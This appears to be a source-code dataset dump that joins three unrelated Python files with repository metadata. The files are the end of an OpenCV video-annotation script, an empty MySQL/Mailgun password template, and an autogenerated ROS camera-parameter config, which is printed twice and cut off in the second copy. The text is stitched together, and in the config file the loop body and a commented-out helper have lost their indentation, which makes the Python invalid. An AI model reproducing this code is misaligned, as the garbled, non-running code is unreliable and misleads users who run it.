while cap.isOpened():
    ret, frame = cap.read()
    if not ret:
        # FIX: end of stream (or a failed read) returns frame=None;
        # without this guard cv2.line crashed on the final iteration.
        break
    frame = cv2.line(frame, (100, 360), (1200, 360), (0, 0, 255), 6)
    font = cv2.FONT_HERSHEY_SIMPLEX
    frame = cv2.putText(frame, ('CAR'), (10, 500), font, 4, (255, 255, 255), 2, cv2.LINE_AA)
    out.write(frame)
    cv2.imshow('frame', frame)
    if cv2.waitKey(25) == ord('q'):
        break
# FIX: release capture/writer handles and close the preview window so
# the output file is finalized properly.
cap.release()
out.release()
cv2.destroyAllWindows()
| 0 | 0 | 0 |
c89b8c23db95676e8374607bed0fe07672faee3d | 176 | py | Python | passwords_template.py | Leibniz-HBI/RADICES | 37ce6303c646b9683c5a9c3159489d290bb16ade | [
"MIT"
] | 13 | 2019-07-18T15:28:02.000Z | 2022-01-03T15:16:06.000Z | passwords_template.py | manilevian/RADICES | 23d119c9c648dc07be4f39dc070b447f89e192f3 | [
"MIT"
] | 23 | 2019-07-12T15:43:27.000Z | 2021-12-15T14:41:11.000Z | passwords_template.py | manilevian/RADICES | 23d119c9c648dc07be4f39dc070b447f89e192f3 | [
"MIT"
] | 2 | 2020-05-05T10:22:50.000Z | 2020-08-31T11:10:07.000Z | sparsetwittermysqlpw = "" # mySQL Database Password
# Details for Mailgun
email_to_notify = ""  # address that should receive notification mails
mailgun_default_smtp_login = ""  # SMTP login for the Mailgun sending domain
mailgun_api_base_url = ""  # base URL of the Mailgun API for your domain
mailgun_api_key = ""  # private Mailgun API key (keep this file out of VCS)
| 22 | 52 | 0.761364 | sparsetwittermysqlpw = "" # mySQL Database Password
# Details for Mailgun
email_to_notify = ""  # address that should receive notification mails
mailgun_default_smtp_login = ""  # SMTP login for the Mailgun sending domain
mailgun_api_base_url = ""  # base URL of the Mailgun API for your domain
mailgun_api_key = ""  # private Mailgun API key (keep this file out of VCS)
| 0 | 0 | 0 |
7258cf2245b83f3ff9ff88e231ad10c39f43c719 | 19,502 | py | Python | RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/astra_camera/cfg/UVCCameraConfig.py | QianheYu/xtark_driver_dev | 1708888161cf20c0d1f45c99d0da4467d69c26c8 | [
"BSD-3-Clause"
] | 1 | 2022-03-11T03:31:15.000Z | 2022-03-11T03:31:15.000Z | RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/astra_camera/cfg/UVCCameraConfig.py | bravetree/xtark_driver_dev | 1708888161cf20c0d1f45c99d0da4467d69c26c8 | [
"BSD-3-Clause"
] | null | null | null | RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/astra_camera/cfg/UVCCameraConfig.py | bravetree/xtark_driver_dev | 1708888161cf20c0d1f45c99d0da4467d69c26c8 | [
"BSD-3-Clause"
] | null | null | null | ## *********************************************************
##
## File autogenerated for the libuvc_camera package
## by the dynamic_reconfigure package.
## Please do not edit.
##
## ********************************************************/
from dynamic_reconfigure.encoding import extract_params
inf = float('inf')
config_description = {'upper': 'DEFAULT', 'lower': 'groups', 'srcline': 245, 'name': 'Default', 'parent': 0, 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'cstate': 'true', 'parentname': 'Default', 'class': 'DEFAULT', 'field': 'default', 'state': True, 'parentclass': '', 'groups': [], 'parameters': [{'srcline': 290, 'description': 'Vendor ID, hex digits (use camera of any vendor if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'vendor', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Product ID, hex digits (use camera of any model if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'product', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Serial number, arbitrary string (use camera of any serial number if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'serial', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Index into the list of cameras that match the above parameters.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'index', 'edit_method': '', 'default': 0, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image width.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': 
'/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'width', 'edit_method': '', 'default': 640, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image height.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'height', 'edit_method': '', 'default': 480, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Format of video stream from camera.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'video_mode', 'edit_method': "{'enum_description': 'Video stream format', 'enum': [{'srcline': 36, 'description': 'Use any uncompressed format', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'uncompressed', 'ctype': 'std::string', 'type': 'str', 'name': 'uncompressed'}, {'srcline': 37, 'description': 'User any compressed format', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'compressed', 'ctype': 'std::string', 'type': 'str', 'name': 'compressed'}, {'srcline': 38, 'description': 'YUYV', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'yuyv', 'ctype': 'std::string', 'type': 'str', 'name': 'yuyv'}, {'srcline': 39, 'description': 'UYVY', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'uyvy', 'ctype': 'std::string', 'type': 'str', 'name': 'uyvy'}, {'srcline': 40, 'description': 'RGB', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const 
char * const', 'value': 'rgb', 'ctype': 'std::string', 'type': 'str', 'name': 'rgb'}, {'srcline': 41, 'description': 'BGR', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'bgr', 'ctype': 'std::string', 'type': 'str', 'name': 'bgr'}, {'srcline': 42, 'description': 'MJPEG', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'mjpeg', 'ctype': 'std::string', 'type': 'str', 'name': 'mjpeg'}, {'srcline': 43, 'description': 'gray8', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'gray8', 'ctype': 'std::string', 'type': 'str', 'name': 'gray8'}]}", 'default': 'uncompressed', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Camera speed, frames per second.', 'max': 1000.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'frame_rate', 'edit_method': '', 'default': 15.0, 'level': 3, 'min': 0.1, 'type': 'double'}, {'srcline': 290, 'description': 'Method for determining the timestamp.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'timestamp_method', 'edit_method': "{'enum_description': 'Methods for determining the timestamp', 'enum': [{'srcline': 53, 'description': 'Time of publication', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'pub', 'ctype': 'std::string', 'type': 'str', 'name': 'PubTime'}, {'srcline': 54, 'description': 'Time when raw frame capture began', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 
'const char * const', 'value': 'start', 'ctype': 'std::string', 'type': 'str', 'name': 'FrameStartTime'}, {'srcline': 55, 'description': 'Time when raw frame capture ended', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'stop', 'ctype': 'std::string', 'type': 'str', 'name': 'FrameStopTime'}, {'srcline': 56, 'description': 'Time when camera-to-host transfer completed', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'hostrcpt', 'ctype': 'std::string', 'type': 'str', 'name': 'HostReceiptTime'}]}", 'default': 'start', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'ROS tf frame of reference, resolved with tf_prefix unless absolute.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'frame_id', 'edit_method': '', 'default': 'camera', 'level': 0, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Path to camera calibration file.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'camera_info_url', 'edit_method': '', 'default': '', 'level': 0, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Scanning mode.', 'max': 1, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'scanning_mode', 'edit_method': "{'enum_description': 'Scanning modes', 'enum': [{'srcline': 72, 'description': '', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Interlaced'}, {'srcline': 73, 
'description': '', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Progressive'}]}", 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Auto exposure mode.', 'max': 3, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_exposure', 'edit_method': "{'enum_description': 'Auto-exposure modes', 'enum': [{'srcline': 80, 'description': 'Manual exposure, manual iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Manual'}, {'srcline': 81, 'description': 'Auto exposure, auto iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Auto'}, {'srcline': 82, 'description': 'manual exposure, auto iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 2, 'ctype': 'int', 'type': 'int', 'name': 'Shutter_Priority'}, {'srcline': 83, 'description': 'auto exposure, manual iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 3, 'ctype': 'int', 'type': 'int', 'name': 'Aperture_Priority'}]}", 'default': 3, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'In auto mode or shutter priority mode, allow the device to vary frame rate.', 'max': 1, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_exposure_priority', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 
'Length of exposure, seconds.', 'max': 10.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'exposure_absolute', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0001, 'type': 'double'}, {'srcline': 290, 'description': 'Aperture, f.', 'max': 655.35, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'iris_absolute', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Maintain focus automatically.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_focus', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Absolute focal distance, millimeters.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'focus_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Pan (clockwise), arc seconds.', 'max': 648000, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'pan_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -648000, 'type': 'int'}, {'srcline': 290, 'description': 'Tilt (up), arc seconds.', 'max': 648000, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'tilt_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -648000, 'type': 'int'}, {'srcline': 290, 'description': 
'Roll (clockwise), degrees.', 'max': 180, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'roll_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -180, 'type': 'int'}, {'srcline': 290, 'description': 'Image capture disabled.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'privacy', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Backlight compensation, device-dependent (zero for none, increasing compensation above zero).', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'backlight_compensation', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Brightness, device dependent.', 'max': 32767, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'brightness', 'edit_method': '', 'default': 0, 'level': 0, 'min': -32768, 'type': 'int'}, {'srcline': 290, 'description': 'Contrast, device dependent.', 'max': 32767, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'contrast', 'edit_method': '', 'default': 0, 'level': 0, 'min': -32768, 'type': 'int'}, {'srcline': 290, 'description': 'Gain, device dependent.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'gain', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 
290, 'description': 'Power line frequency anti-flicker processing.', 'max': 2, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'power_line_frequency', 'edit_method': "{'enum_description': 'Power line frequency modes', 'enum': [{'srcline': 146, 'description': 'Disabled', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Disabled'}, {'srcline': 147, 'description': '50 Hz', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Freq_50'}, {'srcline': 148, 'description': '60 Hz', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Freq_60'}]}", 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Automatic hue control.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_hue', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Hue, degrees.', 'max': 180.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'hue', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': -180.0, 'type': 'double'}, {'srcline': 290, 'description': 'Saturation, device dependent (zero for grayscale).', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'saturation', 'edit_method': '', 'default': 
0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image sharpness, device dependent.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'sharpness', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Gamma.', 'max': 5.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'gamma', 'edit_method': '', 'default': 1.0, 'level': 0, 'min': 0.01, 'type': 'double'}, {'srcline': 290, 'description': 'Automatic white balance.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_white_balance', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'White balance temperature, degrees.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_temperature', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Blue or U component of white balance, device-dependent.', 'max': 65536.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_BU', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Red or V component of white balance, device-dependent.', 'max': 65536.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 
'name': 'white_balance_RV', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}], 'type': '', 'id': 0}
# Per-parameter lookup tables, populated from config_description by the
# loop below.  NOTE: ``min``, ``max`` and ``type`` shadow builtins; kept
# as-is because this file is autogenerated by dynamic_reconfigure.
min = {}
max = {}
defaults = {}
level = {}
type = {}
all_level = 0  # bitwise OR of every parameter's reconfigure level
#def extract_params(config):
# params = []
# params.extend(config['parameters'])
# for group in config['groups']:
# params.extend(extract_params(group))
# return params
for param in extract_params(config_description):
min[param['name']] = param['min']
max[param['name']] = param['max']
defaults[param['name']] = param['default']
level[param['name']] = param['level']
type[param['name']] = param['type']
all_level = all_level | param['level']
UVCCamera_uncompressed = 'uncompressed'
UVCCamera_compressed = 'compressed'
UVCCamera_yuyv = 'yuyv'
UVCCamera_uyvy = 'uyvy'
UVCCamera_rgb = 'rgb'
UVCCamera_bgr = 'bgr'
UVCCamera_mjpeg = 'mjpeg'
UVCCamera_gray8 = 'gray8'
UVCCamera_PubTime = 'pub'
UVCCamera_FrameStartTime = 'start'
UVCCamera_FrameStopTime = 'stop'
UVCCamera_HostReceiptTime = 'hostrcpt'
UVCCamera_Interlaced = 0
UVCCamera_Progressive = 1
UVCCamera_Manual = 0
UVCCamera_Auto = 1
UVCCamera_Shutter_Priority = 2
UVCCamera_Aperture_Priority = 3
UVCCamera_Disabled = 0
UVCCamera_Freq_50 = 1
UVCCamera_Freq_60 = 1
| 336.241379 | 18,051 | 0.677879 | ## *********************************************************
##
## File autogenerated for the libuvc_camera package
## by the dynamic_reconfigure package.
## Please do not edit.
##
## ********************************************************/
from dynamic_reconfigure.encoding import extract_params
inf = float('inf')
config_description = {'upper': 'DEFAULT', 'lower': 'groups', 'srcline': 245, 'name': 'Default', 'parent': 0, 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'cstate': 'true', 'parentname': 'Default', 'class': 'DEFAULT', 'field': 'default', 'state': True, 'parentclass': '', 'groups': [], 'parameters': [{'srcline': 290, 'description': 'Vendor ID, hex digits (use camera of any vendor if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'vendor', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Product ID, hex digits (use camera of any model if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'product', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Serial number, arbitrary string (use camera of any serial number if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'serial', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Index into the list of cameras that match the above parameters.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'index', 'edit_method': '', 'default': 0, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image width.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': 
'/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'width', 'edit_method': '', 'default': 640, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image height.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'height', 'edit_method': '', 'default': 480, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Format of video stream from camera.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'video_mode', 'edit_method': "{'enum_description': 'Video stream format', 'enum': [{'srcline': 36, 'description': 'Use any uncompressed format', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'uncompressed', 'ctype': 'std::string', 'type': 'str', 'name': 'uncompressed'}, {'srcline': 37, 'description': 'User any compressed format', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'compressed', 'ctype': 'std::string', 'type': 'str', 'name': 'compressed'}, {'srcline': 38, 'description': 'YUYV', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'yuyv', 'ctype': 'std::string', 'type': 'str', 'name': 'yuyv'}, {'srcline': 39, 'description': 'UYVY', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'uyvy', 'ctype': 'std::string', 'type': 'str', 'name': 'uyvy'}, {'srcline': 40, 'description': 'RGB', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const 
char * const', 'value': 'rgb', 'ctype': 'std::string', 'type': 'str', 'name': 'rgb'}, {'srcline': 41, 'description': 'BGR', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'bgr', 'ctype': 'std::string', 'type': 'str', 'name': 'bgr'}, {'srcline': 42, 'description': 'MJPEG', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'mjpeg', 'ctype': 'std::string', 'type': 'str', 'name': 'mjpeg'}, {'srcline': 43, 'description': 'gray8', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'gray8', 'ctype': 'std::string', 'type': 'str', 'name': 'gray8'}]}", 'default': 'uncompressed', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Camera speed, frames per second.', 'max': 1000.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'frame_rate', 'edit_method': '', 'default': 15.0, 'level': 3, 'min': 0.1, 'type': 'double'}, {'srcline': 290, 'description': 'Method for determining the timestamp.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'timestamp_method', 'edit_method': "{'enum_description': 'Methods for determining the timestamp', 'enum': [{'srcline': 53, 'description': 'Time of publication', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'pub', 'ctype': 'std::string', 'type': 'str', 'name': 'PubTime'}, {'srcline': 54, 'description': 'Time when raw frame capture began', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 
